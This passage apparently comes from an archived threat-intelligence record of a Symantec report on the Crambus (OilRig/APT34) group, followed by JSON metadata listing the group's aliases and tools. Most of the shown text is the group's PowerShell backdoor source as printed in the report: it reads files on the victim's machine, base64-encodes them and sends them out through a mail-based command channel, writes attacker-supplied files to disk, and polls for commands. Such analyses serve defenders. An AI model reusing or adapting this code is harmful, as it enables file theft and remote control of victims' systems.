16\n\n$Total\r\n+=\"$($uuid)$($userid):$($h.Name):$($uuid)$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"$run\"))):$($uu\r\n[System.Environment]::Newline\r\n}\r\n}\r\nsendMessage $mailSender $Total\r\n}\r\nif($df -eq $true)\r\n{\r\n$uuid = -join ((65..90) + (97..122) | Get-Random -Count7   | % {[char]$_})\r\nforeach ($h in $dl.GetEnumerator())\r\n{\r\nif   (($h.value).Length%4   -ne0)\r\n{\r\n$newpath = $($h.value).PadRight(($($h.value).Length+$($h.value).Length%4),'=')\r\n$path =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($newpath)).Replace('\"',\"\")\r\n}else{\r\n$path =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h.value)).Replace('\"',\"\")\r\n}\r\n$size = (Get-Item $path).Length\r\nif($size -lt 5mb )\r\n{\r\n$DataBytes= [System.IO.File]::ReadAllBytes($path)\r\n$Datab64 = [Convert]::ToBase64String($DataBytes)\r\n$ext = [System.IO.Path]::GetExtension($path)\r\n$extb64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($ext))\r\n}\r\nelse\r\n{\r\n$Datab64= [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"Size is\r\nGreater than 5 MB\"))\r\n$extb64= [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\".txt\"))\r\n}\r\n$Total +=\"$($uuid)$($userid):$($h.Name):$($uuid)$($Datab64):$($uuid)$($extb64)\"+\r\n[System.Environment]::Newline\r\n}\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 13 of 16\n\nsendMessage $mailSender $Total\r\n}\r\nif($uf -eq $true)\r\n{\r\n$uuid = -join ((65..90) + (97..122) | Get-Random -Count7   | % {[char]$_})\r\nforeach ($h in $up.GetEnumerator())\r\n{\r\n$Fileb64 = ($h.value).split(':')[0]\r\n$Pathb64 = ($h.value).split(':')[1]\r\nif   ($Pathb64.Length%4   -ne0)\r\n{\r\n$newpathb64 = $Pathb64.PadRight(($Pathb64.Length+$Pathb64.Length%4),'=')\r\n$path_save =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($newpathb64)).Replace('\"','')\r\n}else{\r\n$path_save =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Pathb64)).Replace('\"','')\r\n}\r\nif   ($Fileb64.Length%4   -ne0)\r\n{\r\n$newFileb64 = $Fileb64.PadRight(($Fileb64.Length+$Fileb64.Length%4),'=')\r\n$Fileb64Bytes = [System.Convert]::FromBase64String($newFileb64)\r\n}else{\r\n$Fileb64Bytes = [System.Convert]::FromBase64String($Fileb64)\r\n}\r\n[System.IO.File]::WriteAllBytes($path_save,$Fileb64Bytes)\r\n$Datab64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"file\r\nupload\"))\r\n$extb64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\".txt\"))\r\n$Total +=\"$($uuid)$($userid):$($h.Name):$($uuid)$($Datab64):$($uuid)$($extb64)\"+\r\n[System.Environment]::Newline\r\n}\r\nsendMessage $mailSender $Total\r\n}\r\n}}\r\nFunction listen\r\n{\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 14 of 16\n\n$timer = [System.Diagnostics.Stopwatch]::StartNew()\r\nwhile(($timer.Elapsed.TotalMinutes -lt5) -and (([string]::IsNullOrEmpty($value))))\r\n{\r\n$value = verify\r\nStart-Sleep -Seconds10\r\n}\r\n$timer.Stop()\r\nif(-not[string]::IsNullOrEmpty($value))\r\n{\r\nif($value[0] -eq\"planA\")\r\n{\r\nreturn   $true\r\n}\r\nif($value[0] -eq\"planB\")\r\n{\r\n$mailList+= $value[1]\r\nsendMessage $value[1] $userid\r\nreturn   $true\r\n}\r\n}\r\nelse\r\n{\r\nreturn   $false\r\n}\r\n}\r\nfunction alive\r\n{\r\nforeach ($mail in $mailList)\r\n{\r\nsendMessage $mail $userid\r\n$liste = listen\r\nif($liste -eq $true)\r\n{\r\nreturn   $true\r\n}\r\n}\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 15 of 16\n\nreturn   $false\r\n}\r\nfunction core\r\n{\r\n$global:flag= $true\r\n$value = verify\r\nif(-not[string]::IsNullOrEmpty($value))\r\n{\r\nif($value[0] -eq\"planA\")\r\n{\r\nmain $value[1]\r\n}\r\n}\r\n}\r\n$connect = connection\r\nif($connect -eq $true)\r\n{\r\nif($directory.Name -ne'config.conf')\r\n{\r\n$global:flag= $false\r\n$aliv = alive\r\nif($aliv -eq $true)\r\n{\r\ntry{New-Item -Path\"$($dir)\"   -ItemType File -Name\"config.conf\"   -ErrorAction\r\nStop;core}catch{}\r\n}\r\n}else{core}\r\n}else{exit}\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government" ], "report_names": [ "crambus-middle-east-government" ], "threat_actors": [ { "id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4", "created_at": "2022-10-25T15:50:23.458833Z", "updated_at": "2026-04-10T02:00:05.419537Z", "deleted_at": null, "main_name": "APT34", "aliases": null, "source_name": "MITRE:APT34", "tools": [ "netstat", "Systeminfo", "PsExec", "SEASHARPEE", "Tasklist", "Mimikatz", "POWRUNER", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b", "created_at": "2025-08-07T02:03:24.722093Z", "updated_at": "2026-04-10T02:00:03.681914Z", "deleted_at": null, "main_name": "COBALT EDGEWATER", "aliases": [ "APT34 ", "Cold River ", "DNSpionage " ], "source_name": "Secureworks:COBALT EDGEWATER", "tools": [ "AgentDrable", "DNSpionage", "Karkoff", "MailDropper", "SideTwist", "TWOTONE" ], "source_id": "Secureworks", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434313, "ts_updated_at": 1775826785, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/cd1dcf4cafcbbfda661f8deb763e38a1905a714e.pdf", "text": "https://archive.orkl.eu/cd1dcf4cafcbbfda661f8deb763e38a1905a714e.txt", "img": "https://archive.orkl.eu/cd1dcf4cafcbbfda661f8deb763e38a1905a714e.jpg" } }